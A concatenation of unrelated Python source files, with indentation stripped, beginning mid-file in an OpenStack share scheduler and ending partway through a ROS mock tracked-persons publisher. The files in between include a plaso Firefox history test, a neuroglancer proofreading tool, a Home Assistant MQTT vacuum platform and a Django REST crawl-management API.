# Note: remember, we are using an iterator here. So only
# traverse this list once.
hosts = self.host_manager.get_all_host_states_share(elevated)
# Filter local hosts based on requirements ...
hosts = self.host_manager.get_filtered_hosts(hosts,
filter_properties)
if not hosts:
return None
LOG.debug(_("Filtered share %(hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
weighed_hosts = self.host_manager.get_weighed_hosts(hosts,
filter_properties)
best_host = weighed_hosts[0]
LOG.debug(_("Choosing for share: %(best_host)s") % locals())
#NOTE(rushiagr): updating the available space parameters at same place
best_host.obj.consume_from_volume(share_properties)
return best_host
def _populate_retry_share(self, filter_properties, properties):
"""Populate filter properties with history of retries for this
request. If maximum retries is exceeded, raise NoValidHost.
"""
max_attempts = self.max_attempts
retry = filter_properties.pop('retry', {})
if max_attempts == 1:
# re-scheduling is disabled.
return
# retry is enabled, update attempt count:
if retry:
retry['num_attempts'] += 1
else:
retry = {
'num_attempts': 1,
'hosts': [] # list of share service hosts tried
}
filter_properties['retry'] = retry
share_id = properties.get('share_id')
self._log_share_error(share_id, retry)
if retry['num_attempts'] > max_attempts:
msg = _("Exceeded max scheduling attempts %(max_attempts)d for "
"share %(share_id)s") % locals()
raise exception.NoValidHost(reason=msg)
def _log_share_error(self, share_id, retry):
"""If the request contained an exception from a previous share
create operation, log it to aid debugging.
"""
exc = retry.pop('exc', None) # string-ified exception from share
if not exc:
return # no exception info from a previous attempt, skip
hosts = retry.get('hosts', None)
if not hosts:
return # no previously attempted hosts, skip
last_host = hosts[-1]
msg = _("Error scheduling %(share_id)s from last share-service: "
"%(last_host)s : %(exc)s") % locals()
LOG.error(msg)
def populate_filter_properties_share(self, request_spec,
filter_properties):
"""Stuff things into filter_properties. Can be overridden in a
subclass to add more data.
"""
shr = request_spec['share_properties']
filter_properties['size'] = shr['size']
filter_properties['availability_zone'] = shr.get('availability_zone')
filter_properties['user_id'] = shr.get('user_id')
filter_properties['metadata'] = shr.get('metadata')
|
"""Tests for the Mozilla Firefox history database plugin."""
import collections
import unittest
from plaso.lib import definitions
from plaso.parsers.sqlite_plugins import firefox_history
from tests.parsers.sqlite_plugins import test_lib
class FirefoxHistoryPluginTest(test_lib.SQLitePluginTestCase):
"""Tests for the Mozilla Firefox history database plugin."""
def testProcessPriorTo24(self):
"""Tests the Process function on a Firefox History database file."""
# This is probably version 23 but potentially an older version.
plugin = firefox_history.FirefoxHistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['places.sqlite'], plugin)
# The places.sqlite file contains 205 events (1 page visit,
# 2 x 91 bookmark records, 2 x 3 bookmark annotations,
# 2 x 8 bookmark folders).
# However there are three events that do not have a timestamp
# so the test file will show 202 extracted events.
number_of_events = storage_writer.GetNumberOfAttributeContainers('event')
self.assertEqual(number_of_events, 202)
number_of_warnings = storage_writer.GetNumberOfAttributeContainers(
'extraction_warning')
self.assertEqual(number_of_warnings, 0)
number_of_warnings = storage_writer.GetNumberOfAttributeContainers(
'recovery_warning')
self.assertEqual(number_of_warnings, 0)
events = list(storage_writer.GetEvents())
# Check the first page visited event.
expected_event_values = {
'data_type': 'firefox:places:page_visited',
'date_time': '2011-07-01 11:16:21.371935',
'host': 'news.google.com',
'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_VISITED,
'title': 'Google News',
'url': 'http://news.google.com/',
'visit_count': 1,
'visit_type': 2}
self.CheckEventValues(storage_writer, events[0], expected_event_values)
# Check the first bookmark event.
expected_event_values = {
'data_type': 'firefox:places:bookmark',
'date_time': '2011-07-01 11:13:59.266344',
'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}
self.CheckEventValues(storage_writer, events[1], expected_event_values)
# Check the second bookmark event.
expected_event_values = {
'data_type': 'firefox:places:bookmark',
'date_time': '2011-07-01 11:13:59.267198',
'places_title': (
'folder=BOOKMARKS_MENU&folder=UNFILED_BOOKMARKS&folder=TOOLBAR&'
'sort=12&excludeQueries=1&excludeItemIfParentHasAnnotation=livemark'
'%2FfeedURI&maxResults=10&queryType=1'),
'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
'title': 'Recently Bookmarked',
'type': 'URL',
'url': (
'place:folder=BOOKMARKS_MENU&folder=UNFILED_BOOKMARKS&folder='
'TOOLBAR&sort=12&excludeQueries=1&excludeItemIfParentHasAnnotation='
'livemark%2FfeedURI&maxResults=10&queryType=1'),
'visit_count': 0}
self.CheckEventValues(storage_writer, events[2], expected_event_values)
# Check the first bookmark annotation event.
expected_event_values = {
'data_type': 'firefox:places:bookmark_annotation',
'date_time': '2011-07-01 11:13:59.267146',
'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}
self.CheckEventValues(storage_writer, events[183], expected_event_values)
# Check another bookmark annotation event.
expected_event_values = {
'content': 'RecentTags',
'data_type': 'firefox:places:bookmark_annotation',
'date_time': '2011-07-01 11:13:59.267605',
'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED,
'title': 'Recent Tags',
'url': 'place:sort=14&type=6&maxResults=10&queryType=1'}
self.CheckEventValues(storage_writer, events[184], expected_event_values)
# Check the second last bookmark folder event.
expected_event_values = {
'data_type': 'firefox:places:bookmark_folder',
'date_time': '2011-03-21 10:05:01.553774',
'timestamp_desc': definitions.TIME_DESCRIPTION_ADDED}
self.CheckEventValues(storage_writer, events[200], expected_event_values)
# Check the last bookmark folder event.
expected_event_values = {
'data_type': 'firefox:places:bookmark_folder',
'date_time': '2011-07-01 11:14:11.766851',
'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
'title': 'Latest Headlines'}
self.CheckEventValues(storage_writer, events[201], expected_event_values)
def testProcessVersion25(self):
"""Tests the Process function on a Firefox History database file v 25."""
plugin = firefox_history.FirefoxHistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['places_new.sqlite'], plugin)
# The places.sqlite file contains 84 events:
# 34 page visits.
# 28 bookmarks
# 14 bookmark folders
# 8 annotations
number_of_events = storage_writer.GetNumberOfAttributeContainers('event')
self.assertEqual(number_of_events, 84)
number_of_warnings = storage_writer.GetNumberOfAttributeContainers(
'extraction_warning')
self.assertEqual(number_of_warnings, 0)
number_of_warnings = storage_writer.GetNumberOfAttributeContainers(
'recovery_warning')
self.assertEqual(number_of_warnings, 0)
events = list(storage_writer.GetEvents())
counter = collections.Counter()
for event in events:
event_data = self._GetEventDataOfEvent(storage_writer, event)
counter[event_data.data_type] += 1
self.assertEqual(counter['firefox:places:bookmark'], 28)
self.assertEqual(counter['firefox:places:page_visited'], 34)
self.assertEqual(counter['firefox:places:bookmark_folder'], 14)
self.assertEqual(counter['firefox:places:bookmark_annotation'], 8)
expected_event_values = {
'data_type': 'firefox:places:page_visited',
'date_time': '2013-10-30 21:57:11.281942',
'host': 'code.google.com',
'url': 'http://code.google.com/p/plaso',
'visit_count': 1,
'visit_type': 2}
self.CheckEventValues(storage_writer, events[10], expected_event_values)
if __name__ == '__main__':
unittest.main()
|
from __future__ import absolute_import
from .factory import toolkit_factory
myTextEditor = toolkit_factory("text_editor", "myTextEditor")
|
"""Context manager to help with Control-C handling during critical commands."""
import signal
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.test.lib import exit_code
class CancellableTestSection(object):
"""Cancel a test matrix if CTRL-C is typed during a section of code.
While within this context manager, the CTRL-C signal is caught and a test
matrix is cancelled. This should only be used with a section of code where
the test matrix is running.
"""
def __init__(self, matrix_id, testing_api_helper):
self._old_handler = None
self._matrix_id = matrix_id
self._testing_api_helper = testing_api_helper
def __enter__(self):
self._old_handler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, self._Handler)
return self
def __exit__(self, typ, value, traceback):
signal.signal(signal.SIGINT, self._old_handler)
return False
def _Handler(self, unused_signal, unused_frame):
log.status.write('\n\nCancelling test [{id}]...\n\n'
.format(id=self._matrix_id))
self._testing_api_helper.CancelTestMatrix(self._matrix_id)
raise exceptions.ExitCodeNoError(exit_code=exit_code.MATRIX_CANCELLED)
|
import sys, random
if len(sys.argv) != 3:
sys.stderr.write("Must provide file with list of filenames and number of files to pick\n")
sys.exit(1)
file_list = open(sys.argv[1])
file_array = []
for filepath in file_list:
file_array.append(filepath.strip())
try:
choices = int(sys.argv[2])
except:
sys.stderr.write("Can't get the number of files to pick\n")
sys.exit(1)
for i in range(choices):
sys.stdout.write("%s\n" % random.choice(file_array))
|
from __future__ import division
import json
import os
import copy
import collections
import argparse
import csv
import neuroglancer
import neuroglancer.cli
import numpy as np
class State(object):
def __init__(self, path):
self.path = path
self.body_labels = collections.OrderedDict()
def load(self):
if os.path.exists(self.path):
with open(self.path, 'r') as f:
self.body_labels = collections.OrderedDict(json.load(f))
def save(self):
tmp_path = self.path + '.tmp'
with open(tmp_path, 'w') as f:
f.write(json.dumps(self.body_labels.items()))
os.rename(tmp_path, self.path)
Body = collections.namedtuple('Body', ['segment_id', 'num_voxels', 'bbox_start', 'bbox_size'])
class Tool(object):
def __init__(self, state_path, bodies, labels, segmentation_url, image_url, num_to_prefetch):
self.state = State(state_path)
self.num_to_prefetch = num_to_prefetch
self.viewer = neuroglancer.Viewer()
self.bodies = bodies
self.state.load()
self.total_voxels = sum(x.num_voxels for x in bodies)
self.cumulative_voxels = np.cumsum([x.num_voxels for x in bodies])
with self.viewer.txn() as s:
s.layers['image'] = neuroglancer.ImageLayer(source=image_url)
s.layers['segmentation'] = neuroglancer.SegmentationLayer(source=segmentation_url)
s.show_slices = False
s.concurrent_downloads = 256
s.gpu_memory_limit = 2 * 1024 * 1024 * 1024
s.layout = '3d'
key_bindings = [
['bracketleft', 'prev-index'],
['bracketright', 'next-index'],
['home', 'first-index'],
['end', 'last-index'],
['control+keys', 'save'],
]
label_keys = ['keyd', 'keyf', 'keyg', 'keyh']
for label, label_key in zip(labels, label_keys):
key_bindings.append([label_key, 'label-%s' % label])
def label_func(s, label=label):
self.set_label(s, label)
self.viewer.actions.add('label-%s' % label, label_func)
self.viewer.actions.add('prev-index', self._prev_index)
self.viewer.actions.add('next-index', self._next_index)
self.viewer.actions.add('first-index', self._first_index)
self.viewer.actions.add('last-index', self._last_index)
self.viewer.actions.add('save', self.save)
with self.viewer.config_state.txn() as s:
for key, command in key_bindings:
s.input_event_bindings.viewer[key] = command
s.status_messages['help'] = ('KEYS: ' + ' | '.join('%s=%s' % (key, command)
for key, command in key_bindings))
self.index = -1
self.set_index(self._find_one_after_last_labeled_index())
def _find_one_after_last_labeled_index(self):
body_index = 0
while self.bodies[body_index].segment_id in self.state.body_labels:
body_index += 1
return body_index
def set_index(self, index):
if index == self.index:
return
body = self.bodies[index]
self.index = index
def modify_state_for_body(s, body):
s.layers['segmentation'].segments = frozenset([body.segment_id])
s.voxel_coordinates = body.bbox_start + body.bbox_size // 2
with self.viewer.txn() as s:
modify_state_for_body(s, body)
prefetch_states = []
for i in range(self.num_to_prefetch):
prefetch_index = self.index + i + 1
if prefetch_index >= len(self.bodies):
break
prefetch_state = copy.deepcopy(self.viewer.state)
prefetch_state.layout = '3d'
modify_state_for_body(prefetch_state, self.bodies[prefetch_index])
prefetch_states.append(prefetch_state)
with self.viewer.config_state.txn() as s:
s.prefetch = [
neuroglancer.PrefetchState(state=prefetch_state, priority=-i)
for i, prefetch_state in enumerate(prefetch_states)
]
label = self.state.body_labels.get(body.segment_id, '')
with self.viewer.config_state.txn() as s:
s.status_messages['status'] = (
'[Segment %d/%d : %d/%d voxels labeled = %.3f fraction] label=%s' %
(index, len(self.bodies), self.cumulative_voxels[index], self.total_voxels,
self.cumulative_voxels[index] / self.total_voxels, label))
def save(self, s):
self.state.save()
def set_label(self, s, label):
self.state.body_labels[self.bodies[self.index].segment_id] = label
self.set_index(self.index + 1)
def _first_index(self, s):
self.set_index(0)
def _last_index(self, s):
self.set_index(max(0, self._find_one_after_last_labeled_index() - 1))
def _next_index(self, s):
self.set_index(self.index + 1)
def _prev_index(self, s):
self.set_index(max(0, self.index - 1))
if __name__ == '__main__':
ap = argparse.ArgumentParser()
neuroglancer.cli.add_server_arguments(ap)
ap.add_argument('--image-url', required=True, help='Neuroglancer data source URL for image')
ap.add_argument('--segmentation-url',
required=True,
help='Neuroglancer data source URL for segmentation')
ap.add_argument('--state', required=True, help='Path to proofreading state file')
ap.add_argument('--bodies', required=True, help='Path to list of bodies to proofread')
ap.add_argument('--labels', nargs='+', help='Labels to use')
ap.add_argument('--prefetch', type=int, default=10, help='Number of bodies to prefetch')
args = ap.parse_args()
neuroglancer.cli.handle_server_arguments(args)
bodies = []
with open(args.bodies, 'r') as f:
csv_reader = csv.DictReader(f)
for row in csv_reader:
bodies.append(
Body(
segment_id=int(row['id']),
num_voxels=int(row['num_voxels']),
bbox_start=np.array([
int(row['bbox.start.x']),
int(row['bbox.start.y']),
int(row['bbox.start.z'])
],
dtype=np.int64),
bbox_size=np.array(
[int(row['bbox.size.x']),
int(row['bbox.size.y']),
int(row['bbox.size.z'])],
dtype=np.int64),
))
tool = Tool(
state_path=args.state,
image_url=args.image_url,
segmentation_url=args.segmentation_url,
labels=args.labels,
bodies=bodies,
num_to_prefetch=args.prefetch,
)
print(tool.viewer)
|
"""
"""
from __future__ import absolute_import
from .StrStrHashMap import *
from ..msg.Field import *
from ..msg.ImportExportHelper import *
from ..msg.StructValue import *
from ..msg.Type import *
from ..msg.ValueFactory import *
from ..support.Class2TypeMap import *
from ..support.Validator_object import *
class StrStrHashMapSerializer(ImportExportHelper):
"""
etch serializer for StrStrHashMap
"""
FIELD_NAME = "keysAndValues"
@classmethod
def init(cls, typ, class2type):
"""
Defines custom fields in the value factory so that the importer can find them
@param typ
@param class2type
"""
field = typ.getField(cls.FIELD_NAME)
class2type.put( StrStrHashMap , typ )
typ.setComponentType( StrStrHashMap )
typ.setImportExportHelper( StrStrHashMapSerializer(typ, field))
typ.putValidator(field, Validator_object.get(1))
typ.lock()
def __init__(self, typ, field):
self.__type = typ
self.__field = field
def importHelper(self, struct):
m = StrStrHashMap()
keysAndValues = struct.get(self.__field)
for i in range(0, len(keysAndValues), 2):
m[keysAndValues[i]] = keysAndValues[i+1]
return m
def exportValue(self, vf, value):
m = StrStrHashMap(value)
keysAndValues = []
for i in m.keys():
keysAndValues.append(i)
keysAndValues.append(m[i])
struct = StructValue(self.__type, vf)
struct.put(self.__field, keysAndValues)
return struct
|
"""
Support for MQTT vacuums.
For more details about this platform, please refer to the documentation at
https://www.home-assistant.io/components/vacuum.mqtt/
"""
import logging
import voluptuous as vol
from homeassistant.components.vacuum import DOMAIN
from homeassistant.components.mqtt import ATTR_DISCOVERY_HASH
from homeassistant.components.mqtt.discovery import (
MQTT_DISCOVERY_NEW,
clear_discovery_hash,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .schema import CONF_SCHEMA, LEGACY, STATE, MQTT_VACUUM_SCHEMA
from .schema_legacy import PLATFORM_SCHEMA_LEGACY, async_setup_entity_legacy
from .schema_state import PLATFORM_SCHEMA_STATE, async_setup_entity_state
_LOGGER = logging.getLogger(__name__)
def validate_mqtt_vacuum(value):
"""Validate MQTT vacuum schema."""
schemas = {LEGACY: PLATFORM_SCHEMA_LEGACY, STATE: PLATFORM_SCHEMA_STATE}
return schemas[value[CONF_SCHEMA]](value)
PLATFORM_SCHEMA = vol.All(
MQTT_VACUUM_SCHEMA.extend({}, extra=vol.ALLOW_EXTRA), validate_mqtt_vacuum
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up MQTT vacuum through configuration.yaml."""
await _async_setup_entity(config, async_add_entities, discovery_info)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up MQTT vacuum dynamically through MQTT discovery."""
async def async_discover(discovery_payload):
"""Discover and add a MQTT vacuum."""
try:
discovery_hash = discovery_payload.pop(ATTR_DISCOVERY_HASH)
config = PLATFORM_SCHEMA(discovery_payload)
await _async_setup_entity(
config, async_add_entities, config_entry, discovery_hash
)
except Exception:
if discovery_hash:
clear_discovery_hash(hass, discovery_hash)
raise
async_dispatcher_connect(
hass, MQTT_DISCOVERY_NEW.format(DOMAIN, "mqtt"), async_discover
)
async def _async_setup_entity(
config, async_add_entities, config_entry, discovery_hash=None
):
"""Set up the MQTT vacuum."""
setup_entity = {LEGACY: async_setup_entity_legacy, STATE: async_setup_entity_state}
await setup_entity[config[CONF_SCHEMA]](
config, async_add_entities, config_entry, discovery_hash
)
|
import json
from idpproxy.social.oauth import OAuth
import oauth2 as oauth
import logging
logger = logging.getLogger(__name__)
__author__ = 'rohe0002'
class LinkedIn(OAuth):
def __init__(self, client_id, client_secret, **kwargs):
OAuth.__init__(self, client_id, client_secret, **kwargs)
def get_profile(self, info_set):
token = oauth.Token(key=info_set["oauth_token"][0],
secret=info_set["oauth_token_secret"][0])
client = oauth.Client(self.consumer, token)
resp, content = client.request(self.extra["userinfo_endpoint"], "GET")
res = json.loads(content)
logger.debug("userinfo: %s" % res)
res["user_id"] = info_set["oauth_token"]
return resp, res
|
import angr
class InterlockedExchange(angr.SimProcedure):
def run(self, target, value): #pylint:disable=arguments-differ
if not self.state.solver.symbolic(target):
old_value = self.state.memory.load(target, 4, endness=self.state.arch.memory_endness)
self.state.memory.store(target, value)
else:
old_value = self.state.solver.Unconstrained("unconstrained_ret_%s" % self.display_name, self.state.arch.bits, key=('api', 'InterlockedExchange'))
return old_value
|
import subprocess
from rstgen.utils import confirm
from django.core.management.base import BaseCommand
from django.conf import settings
def runcmd(cmd, **kw): # same code as in getlino.py
"""Run the cmd similar as os.system(), but stop when Ctrl-C."""
# kw.update(stdout=subprocess.PIPE)
# kw.update(stderr=subprocess.STDOUT)
kw.update(shell=True)
kw.update(universal_newlines=True)
kw.update(check=True)
# subprocess.check_output(cmd, **kw)
subprocess.run(cmd, **kw)
# os.system(cmd)
class Command(BaseCommand):
help = "Run 'pip install --upgrade' for all Python packages required by this site."
requires_system_checks = False
def add_arguments(self, parser):
parser.add_argument('--noinput', action='store_false',
dest='interactive', default=True,
help='Do not prompt for input of any kind.')
parser.add_argument('-l', '--list', action='store_true',
dest='list', default=False,
help="Just list the requirements, don't install them.")
def handle(self, *args, **options):
reqs = set(settings.SITE.get_requirements())
if len(reqs) == 0:
print("No requirements")
else:
reqs = sorted(reqs)
if options['list']:
print('\n'.join(reqs))
return
runcmd('pip install --upgrade pip')
# cmd = "pip install --upgrade --trusted-host svn.forge.pallavi.be {}".format(' '.join(reqs))
cmd = "pip install --upgrade {}".format(' '.join(reqs))
if not options['interactive'] or confirm("{} (y/n) ?".format(cmd)):
runcmd(cmd)
|
import shutil
import json
from rest_framework import routers, serializers, viewsets, parsers, filters
from rest_framework.views import APIView
from rest_framework.exceptions import APIException
from rest_framework.response import Response
from django.core.exceptions import ValidationError
from django.core.files.uploadedfile import SimpleUploadedFile, InMemoryUploadedFile
from django.core.validators import URLValidator
from base.models import Project, SeedsList
from apps.crawl_space.models import Crawl, CrawlModel
from elasticsearch import Elasticsearch
from elasticsearch.exceptions import ConnectionError, NotFoundError
class DataWakeIndexUnavailable(APIException):
status_code = 404
default_detail = "The server failed to find the DataWake index in elasticsearch."
class SlugModelSerializer(serializers.ModelSerializer):
slug = serializers.SlugField(required=False, read_only=True)
class ProjectSerializer(SlugModelSerializer):
url = serializers.CharField(read_only=True)
class Meta:
model = Project
class CrawlSerializer(SlugModelSerializer):
# Expose these fields, but only as read only.
id = serializers.ReadOnlyField()
seeds_list = serializers.FileField(read_only=True, use_url=False)
status = serializers.CharField(read_only=True)
config = serializers.CharField(read_only=True)
index_name = serializers.CharField(read_only=True)
url = serializers.CharField(read_only=True)
pages_crawled = serializers.IntegerField(read_only=True)
harvest_rate = serializers.FloatField(read_only=True)
location = serializers.CharField(read_only=True)
def validate_crawler(self, value):
if value == "ache" and not self.initial_data.get("crawl_model"):
raise serializers.ValidationError("Ache crawls require a Crawl Model.")
return value
class Meta:
model = Crawl
class CrawlModelSerializer(SlugModelSerializer):
model = serializers.FileField(use_url=False)
features = serializers.FileField(use_url=False)
url = serializers.CharField(read_only=True)
def validate_model(self, value):
if value.name != "pageclassifier.model":
raise serializers.ValidationError("File must be named pageclassifier.model")
return value
def validate_features(self, value):
if value.name != "pageclassifier.features":
raise serializers.ValidationError("File must be named pageclassifier.features")
return value
class Meta:
model = CrawlModel
class SeedsListSerializer(SlugModelSerializer):
url = serializers.CharField(read_only=True)
file_string = serializers.CharField(read_only=True)
def validate_seeds(self, value):
try:
seeds = json.loads(value)
except ValueError:
raise serializers.ValidationError("Seeds must be a JSON encoded string.")
if type(seeds) != list:
raise serializers.ValidationError("Seeds must be an array of URLs.")
validator = URLValidator()
errors = []
for index, x in enumerate(seeds):
try:
validator(x)
except ValidationError:
# Add index to make it easier for CodeMirror to select the right
# line.
errors.append({index: x})
if errors:
errors.insert(0, "The seeds list contains invalid urls.")
errors.append({"list": "\n".join(seeds)})
raise serializers.ValidationError(errors)
return value
class Meta:
model = SeedsList
"""
Viewset Classes.
Filtering is provided by django-filter.
Backend settings are in common_settings.py under REST_FRAMEWORK. Setting is:
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',)
This backend is supplied to every viewset by default. Alter query fields by adding
or removing items from filter_fields
"""
class ProjectViewSet(viewsets.ModelViewSet):
queryset = Project.objects.all()
serializer_class = ProjectSerializer
filter_fields = ('id', 'slug', 'name',)
class CrawlViewSet(viewsets.ModelViewSet):
queryset = Crawl.objects.all()
serializer_class = CrawlSerializer
filter_fields = ('id', 'slug', 'name', 'description', 'status', 'project',
'crawl_model', 'crawler', 'seeds_object')
class CrawlModelViewSet(viewsets.ModelViewSet):
queryset = CrawlModel.objects.all()
serializer_class = CrawlModelSerializer
filter_fields = ('id', 'slug', 'name', 'project',)
def destroy(self, request, pk=None):
model = CrawlModel.objects.get(pk=pk)
crawls = Crawl.objects.all().filter(crawl_model=pk)
if crawls:
message = "The Crawl Model is being used by the following Crawls and cannot be deleted: "
raise serializers.ValidationError({
"message": message,
"errors": [x.name for x in crawls],
})
else:
shutil.rmtree(model.get_model_path())
return super(CrawlModelViewSet, self).destroy(request)
class SeedsListViewSet(viewsets.ModelViewSet):
queryset = SeedsList.objects.all()
serializer_class = SeedsListSerializer
filter_fields = ('id', 'name', 'seeds', 'slug',)
def create(self, request):
# If a seeds file or a textseeds exists, then use those. Otherwise, look
# for a string in request.data["seeds"]
seeds_list = request.FILES.get("seeds", False)
textseeds = request.data.get("textseeds", False)
if seeds_list:
request.data["seeds"] = json.dumps(map(str.strip, seeds_list.readlines()))
elif textseeds:
if type(textseeds) == unicode:
request.data["seeds"] = json.dumps(map(unicode.strip, textseeds.split("\n")))
# Get rid of carriage return character.
elif type(textseeds) == str:
request.data["seeds"] = json.dumps(map(str.strip, textseeds.split("\n")))
return super(SeedsListViewSet, self).create(request)
def destroy(self, request, pk=None):
seeds = SeedsList.objects.get(pk=pk)
crawls = Crawl.objects.all().filter(seeds_object=pk)
if crawls:
message = "The Seeds List is being used by the following Crawls and cannot be deleted: "
raise serializers.ValidationError({
"message": message,
"errors": [x.name for x in crawls],
})
else:
return super(SeedsListViewSet, self).destroy(request)
class DataWakeView(APIView):
index = "datawake"
es = Elasticsearch()
def create_trails(self, trail_ids):
trails = []
for x in trail_ids:
url_search = self.es.search(index=self.index, q="trail_id:%d" % x,
fields="url", size=1000)["hits"]["hits"]
new_trail = {"trail_id": x, "urls": [], "domain_name":url_search[0]["_type"]}
for y in url_search:
new_trail["urls"].append(y["fields"]["url"][0])
new_trail.update({"urls_string": "\n".join(new_trail["urls"])})
trails.append(new_trail)
return trails
def get(self, request, format=None):
# TODO: catch all exception. At the very least, deal with 404 not found and
# connection refused exceptions.
# Temporarily remove exceptions for debugging.
try:
trail_ids = [x["key"] for x in self.es.search(index=self.index, body={
"aggs" : {
"trail_id" : {
"terms" : { "field" : "trail_id" }
}
}
})["aggregations"]["trail_id"]["buckets"]]
response = self.create_trails(trail_ids)
except ConnectionError as e:
raise OSError("Failed to connect to local elasticsearch instance.")
except NotFoundError:
raise DataWakeIndexUnavailable
return Response(response)
router = routers.DefaultRouter()
router.register(r"projects", ProjectViewSet)
router.register(r"crawls", CrawlViewSet)
router.register(r"crawl_models", CrawlModelViewSet)
router.register(r"seeds_list", SeedsListViewSet)
|
from . import numeric as _nx
from .numeric import asanyarray, newaxis
def atleast_1d(*arys):
res = []
for ary in arys:
ary = asanyarray(ary)
if len(ary.shape) == 0 :
result = ary.reshape(1)
else :
result = ary
res.append(result)
if len(res) == 1:
return res[0]
else:
return res
def atleast_2d(*arys):
res = []
for ary in arys:
ary = asanyarray(ary)
if len(ary.shape) == 0 :
result = ary.reshape(1, 1)
elif len(ary.shape) == 1 :
result = ary[newaxis,:]
else :
result = ary
res.append(result)
if len(res) == 1:
return res[0]
else:
return res
def vstack(tup):
return _nx.concatenate([atleast_2d(_m) for _m in tup], 0)
def hstack(tup):
arrs = [atleast_1d(_m) for _m in tup]
# As a special case, dimension 0 of 1-dimensional arrays is "horizontal"
if arrs[0].ndim == 1:
return _nx.concatenate(arrs, 0)
else:
return _nx.concatenate(arrs, 1)
|
import rospy, yaml, tf
from spencer_tracking_msgs.msg import TrackedPersons, TrackedPerson
from nav_msgs.msg import GridCells
from math import cos, sin, tan, pi, radians
def createTrackedPerson(track_id, x, y, theta):
trackedPerson = TrackedPerson()
theta = radians(theta) + pi/2.0
trackedPerson.track_id = track_id
quaternion = tf.transformations.quaternion_from_euler(0, 0, theta)
trackedPerson.pose.pose.position.x = x
trackedPerson.pose.pose.position.y = y
trackedPerson.pose.pose.orientation.x = quaternion[0]
trackedPerson.pose.pose.orientation.y = quaternion[1]
trackedPerson.pose.pose.orientation.z = quaternion[2]
trackedPerson.pose.pose.orientation.w = quaternion[3]
trackedPerson.pose.covariance[0 + 0 * 6] = 0.001 # x
trackedPerson.pose.covariance[1 + 1 * 6] = 0.001 # y
trackedPerson.pose.covariance[2 + 2 * 6] = 999999 # z
trackedPerson.pose.covariance[3 + 3 * 6] = 999999 # x rotation
trackedPerson.pose.covariance[4 + 5 * 6] = 999999 # y rotation
trackedPerson.pose.covariance[4 + 5 * 6] = 999999 # z rotation
trackedPerson.twist.twist.linear.x = cos(theta)
trackedPerson.twist.twist.linear.y = sin(theta)
for i in range(0, 3):
trackedPerson.twist.covariance[i + i * 6] = 1.0 # linear velocity
for i in range(3, 6):
trackedPerson.twist.covariance[i + i * 6] = float("inf") # rotational velocity
return trackedPerson
def main():
# Main code
trackPublisher = rospy.Publisher('/spencer/perception/tracked_persons', TrackedPersons )
#obstaclesPublisher = rospy.Publisher('/pedsim/static_obstacles', GridCells )
rospy.init_node( 'mock_tracked_persons' )
rate = rospy.Rate(10)
#obstacles = yaml.load(OBSTACLE_YAML)
#obstacles = [ d for d in obstacles]
seqCounter = 0
while not rospy.is_shutdown():
trackedPersons = TrackedPersons()
trackedPersons.header.seq = seqCounter
trackedPersons.header.frame_id = "odom"
trackedPersons.header.stamp = rospy.Time.now()
#trackedPersons.tracks.append( createTrackedPerson( trackId, x, y, theta ) )
trackedPersons.tracks.append( createTrackedPerson( 01, 5, 4, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 02, 6, 5.45878, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 03, 7.22, 5.70, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 04, 2+7.22, 7.33, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 05, 2+8.92, 8.42, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 06, 2+7.92, 10.41, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 07, 2+7.2, 9.44, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 8, 2+7, 14-2, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 9, 2+6, 15.4123-2, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 10, 5-1, 18.595-5, 280 ) )
trackedPersons.tracks.append( createTrackedPerson( 11, 5-1, 20-5, 270 ) )
trackedPersons.tracks.append( createTrackedPerson( 12, 6-1, 21.5491-5, 240 ) )
trackedPersons.tracks.append( createTrackedPerson( 13, 7.48044-1, 19-5, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 14, 6, 24.5463, 45 ) )
trackedPersons.tracks.append( createTrackedPerson( 15, 8, 28, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 16, 10.4458, 23, 68 ) )
trackedPersons.tracks.append( createTrackedPerson( 17, 11.5004, 27, 88 ) )
trackedPersons.tracks.append( createTrackedPerson( 18, 14, 25.4389, 20 ) )
trackedPersons.tracks.append( createTrackedPerson( 19, 15, 21, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 20, 15, 22.4308, 92 ) )
trackedPersons.tracks.append( createTrackedPerson( 21, 15.4676, 24, 91 ) )
trackedPersons.tracks.append( createTrackedPerson( 22, 16.5423, 25.4178, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 23, 18, 20, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 24, 18.5532, 21.5011, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 25, 15.4739, 16.5314, 45 ) )
trackedPersons.tracks.append( createTrackedPerson( 26, 20, 25.5746, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 27, 21.5327, 24, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 28, 22, 26.4632, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 29, 21, 18, 45 ) )
trackedPersons.tracks.append( createTrackedPerson( 30, 23, 20.4335, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 31, 23.4972, 21.4055, 90 ) )
trackedPersons.tracks.append( createTrackedPerson( 32, 23.4025, 22.4749, 90 ) )
